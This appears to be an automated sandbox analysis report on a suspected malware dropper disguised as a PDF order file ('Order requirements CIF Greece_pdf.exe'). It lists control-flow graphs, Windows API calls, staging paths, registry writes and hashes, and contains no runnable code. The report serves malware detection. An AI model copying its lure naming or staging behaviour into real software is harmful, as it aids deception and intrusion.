                                                                                                                                        control_flow_graph 558 4030d8-4030ec 559 4030f5-4030fe 558->559 560 4030ee 558->560 561 403100 559->561 562 403107-40310c 559->562 560->559 561->562 563 40311c-403129 call 4032c7 562->563 564 40310e-403117 call 4032dd 562->564 568 4032b5 563->568 569 40312f-403133 563->569 564->563 570 4032b7-4032b8 568->570 571 403260-403262 569->571 572 403139-40315f GetTickCount 569->572 575 4032c0-4032c4 570->575 573 4032a2-4032a5 571->573 574 403264-403267 571->574 576 403165-40316d 572->576 577 4032bd 572->577 581 4032a7 573->581 582 4032aa-4032b3 call 4032c7 573->582 574->577 578 403269 574->578 579 403172-403180 call 4032c7 576->579 580 40316f 576->580 577->575 584 40326c-403272 578->584 579->568 592 403186-40318f 579->592 580->579 581->582 582->568 590 4032ba 582->590 587 403274 584->587 588 403276-403284 call 4032c7 584->588 587->588 588->568 595 403286-403292 call 405d14 588->595 590->577 594 403195-4031b5 call 406602 592->594 600 403258-40325a 594->600 601 4031bb-4031ce GetTickCount 594->601 602 403294-40329e 595->602 603 40325c-40325e 595->603 600->570 604 4031d0-4031d8 601->604 605 403213-403215 601->605 602->584 610 4032a0 602->610 603->570 606 4031e0-40320b MulDiv wsprintfA call 4051fb 604->606 607 4031da-4031de 604->607 608 403217-40321b 605->608 609 40324c-403250 605->609 615 403210 606->615 607->605 607->606 612 403232-40323d 608->612 613 40321d-403224 call 405d14 608->613 609->576 614 403256 609->614 610->577 617 403240-403244 612->617 618 403229-40322b 613->618 614->577 615->605 617->594 619 40324a 617->619 618->603 620 40322d-403230 618->620 619->577 620->617
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountTick$wsprintf
                                                                                                                                        • String ID: !y$ !y$ ay$... %d%%
                                                                                                                                        • API String ID: 551687249-830929277
                                                                                                                                        • Opcode ID: fb80ba013608f3c098533986785ac97089a2e466ddceb92ce4d814dff21de19d
                                                                                                                                        • Instruction ID: a0ed304c84634e1a182b4cedd43d653909124c4238878ead4aa9bd0ee2fb7366
                                                                                                                                        • Opcode Fuzzy Hash: fb80ba013608f3c098533986785ac97089a2e466ddceb92ce4d814dff21de19d
                                                                                                                                        • Instruction Fuzzy Hash: CE516E31800219ABCB10DFA5DA44A9F7BB8EF44756F1481BFE800B72D0C7389F448BA9

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 621 4051fb-405210 622 4052c6-4052ca 621->622 623 405216-405228 621->623 624 405233-40523f lstrlenA 623->624 625 40522a-40522e call 406167 623->625 627 405241-405251 lstrlenA 624->627 628 40525c-405260 624->628 625->624 627->622 629 405253-405257 lstrcatA 627->629 630 405262-405269 SetWindowTextA 628->630 631 40526f-405273 628->631 629->628 630->631 632 405275-4052b7 SendMessageA * 3 631->632 633 4052b9-4052bb 631->633 632->633 633->622 634 4052bd-4052c0 633->634 634->622
                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
                                                                                                                                        • lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
                                                                                                                                        • lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,74DF23A0), ref: 00405257
                                                                                                                                        • SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
                                                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                        • String ID: subterritories
                                                                                                                                        • API String ID: 2531174081-2942025731
                                                                                                                                        • Opcode ID: 84dc479b8b7881d3249495fb7370a8664623c8244ac58232fd13fde5de382175
                                                                                                                                        • Instruction ID: 95508abd931072ea88f050004e9a273e6bd30dde68a0f7ca5354031f7b80a04f
                                                                                                                                        • Opcode Fuzzy Hash: 84dc479b8b7881d3249495fb7370a8664623c8244ac58232fd13fde5de382175
                                                                                                                                        • Instruction Fuzzy Hash: A521A175900118BBDF119FA9DD809DFBFB9EF09354F1480BAF544B6291C6388E408F98

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 635 40646f-40648f GetSystemDirectoryA 636 406491 635->636 637 406493-406495 635->637 636->637 638 4064a5-4064a7 637->638 639 406497-40649f 637->639 641 4064a8-4064da wsprintfA LoadLibraryExA 638->641 639->638 640 4064a1-4064a3 639->640 640->641
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406486
                                                                                                                                        • wsprintfA.USER32 ref: 004064BF
                                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064D3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                        • API String ID: 2200240437-4240819195
                                                                                                                                        • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                                                                        • Instruction ID: e4af93c3cdb1388bd8c61da79080aae0fca49bc102c632b45afecef183fab820
                                                                                                                                        • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                                                                        • Instruction Fuzzy Hash: D3F0F63055020AABEF159B64DD0DFEB375CEB08344F1400BAA986E10C1EA78D9258BAD

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 642 405c9c-405ca6 643 405ca7-405cd2 GetTickCount GetTempFileNameA 642->643 644 405ce1-405ce3 643->644 645 405cd4-405cd6 643->645 647 405cdb-405cde 644->647 645->643 646 405cd8 645->646 646->647
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00405CB0
                                                                                                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CCA
                                                                                                                                        Strings
                                                                                                                                        • "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe", xrefs: 00405C9C
                                                                                                                                        • nsa, xrefs: 00405CA7
                                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C9F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                                        • String ID: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                        • API String ID: 1716503409-107630211
                                                                                                                                        • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                                                                        • Instruction ID: 300c2e40aa17b99eb6a72bfbf7bdfcd49c284ecfca22a4765a13b30c42836751
                                                                                                                                        • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                                                                        • Instruction Fuzzy Hash: B7F08236308308ABEB108F56ED04B9B7B98EF91750F14803BF944DA280D6B599549B68

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 648 402476-4024a7 call 402bce * 2 call 402c5e 655 402a5a-402a69 648->655 656 4024ad-4024b7 648->656 658 4024c7-4024ca 656->658 659 4024b9-4024c6 call 402bce lstrlenA 656->659 661 4024e1-4024e4 658->661 662 4024cc-4024e0 call 402bac 658->662 659->658 666 4024f5-402509 RegSetValueExA 661->666 667 4024e6-4024f0 call 4030d8 661->667 662->661 670 40250b 666->670 671 40250e-4025eb RegCloseKey 666->671 667->666 670->671 671->655
                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(hattepuldes\Stethospasm84\,00000023,?,00000000,00000002,00000011,00000002), ref: 004024C1
                                                                                                                                        • RegSetValueExA.KERNELBASE(?,?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 00402501
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 004025E5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseValuelstrlen
                                                                                                                                        • String ID: hattepuldes\Stethospasm84\
                                                                                                                                        • API String ID: 2655323295-3628054739
                                                                                                                                        • Opcode ID: 9a6c6d883b07e3aa4fb4fac5b967dc2d5c57ac0b71ef490e589c7d9f7fbbccc2
                                                                                                                                        • Instruction ID: 621c84a53dcaf2a3225fca01673abe6cb58a25da7017df2cdf0d3381b538cbef
                                                                                                                                        • Opcode Fuzzy Hash: 9a6c6d883b07e3aa4fb4fac5b967dc2d5c57ac0b71ef490e589c7d9f7fbbccc2
                                                                                                                                        • Instruction Fuzzy Hash: A1118171E00214BFEF10AFA5DE49EAE7A74EB44314F20843AF505F71D1D6B99D419B28

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 673 4015bb-4015ce call 402bce call 405b05 678 4015d0-4015e3 call 405a97 673->678 679 401624-401627 673->679 686 4015e5-4015e8 678->686 687 4015fb-4015fc call 40573e 678->687 681 401652-4022e2 call 401423 679->681 682 401629-401644 call 401423 call 4060d4 SetCurrentDirectoryA 679->682 696 402a5a-402a69 681->696 682->696 698 40164a-40164d 682->698 686->687 691 4015ea-4015f1 call 40575b 686->691 694 401601-401603 687->694 691->687 703 4015f3-4015f9 call 4056c1 691->703 699 401605-40160a 694->699 700 40161a-401622 694->700 698->696 704 401617 699->704 705 40160c-401615 GetFileAttributesA 699->705 700->678 700->679 703->694 704->700 705->700 705->704
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00405B05: CharNextA.USER32(?,?,007A0970,?,00405B71,007A0970,007A0970,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
                                                                                                                                          • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
                                                                                                                                          • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C
                                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                          • Part of subcall function 004056C1: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704
                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                        Strings
                                                                                                                                        • C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111, xrefs: 00401631
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111
                                                                                                                                        • API String ID: 1892508949-619757925
                                                                                                                                        • Opcode ID: 0633b04426b33a91403708f63f53e35a8aea6b13c15c91267645d809cf00bc01
                                                                                                                                        • Instruction ID: 50be7771e3672f66fe07c9109d7a0934d5fb35c2f40f106ce03ebb8fd80801ba
                                                                                                                                        • Opcode Fuzzy Hash: 0633b04426b33a91403708f63f53e35a8aea6b13c15c91267645d809cf00bc01
                                                                                                                                        • Instruction Fuzzy Hash: F2110831104151EBCB307FA54D409BF37B09A92324B28463FE592B22E3DA3D4942AA2E

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 709 405fbb-405fed call 405f5a 712 40602a 709->712 713 405fef-40601c RegQueryValueExA RegCloseKey 709->713 715 40602d-40602f 712->715 713->712 714 40601e-406022 713->714 714->715 716 406024-406028 714->716 716->712 716->715
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,00406270,80000002), ref: 00406001
                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00406270,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,subterritories), ref: 0040600C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseQueryValue
                                                                                                                                        • String ID: : Completed
                                                                                                                                        • API String ID: 3356406503-2954849223
                                                                                                                                        • Opcode ID: 02b0ca06b85e7c04b5820a528fa41c7769f17ba5f8155b904997ba725fa221fb
                                                                                                                                        • Instruction ID: d626b699d45c1b84179135bbe24e0f50758a75bbb6c39e90c48a844674782db3
                                                                                                                                        • Opcode Fuzzy Hash: 02b0ca06b85e7c04b5820a528fa41c7769f17ba5f8155b904997ba725fa221fb
                                                                                                                                        • Instruction Fuzzy Hash: BB017C7254020AABDF22CF61CC09FDB3FA8EF55364F01803AF959A2190D678D964DBA4

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 717 405773-4057a4 CreateProcessA 718 4057b2-4057b3 717->718 719 4057a6-4057af CloseHandle 717->719 719->718
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D70,Error launching installer), ref: 0040579C
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004057A9
                                                                                                                                        Strings
                                                                                                                                        • Error launching installer, xrefs: 00405786
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                                        • String ID: Error launching installer
                                                                                                                                        • API String ID: 3712363035-66219284
                                                                                                                                        • Opcode ID: cdb3d12e93955e9b982c1d5c04e4c9d7882df22fc18f803694ab679cdbae7595
                                                                                                                                        • Instruction ID: 33f777635f039691b801aef677aa15ec1976f60057d2e453273d56c3b7e761be
                                                                                                                                        • Opcode Fuzzy Hash: cdb3d12e93955e9b982c1d5c04e4c9d7882df22fc18f803694ab679cdbae7595
                                                                                                                                        • Instruction Fuzzy Hash: 58E04FF5600209BFEB009BA0DD09F7B7BACEB04304F008520BD40F2190D774A8148E78
                                                                                                                                        APIs
                                                                                                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                                                                                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 004025CD
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 004025E5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
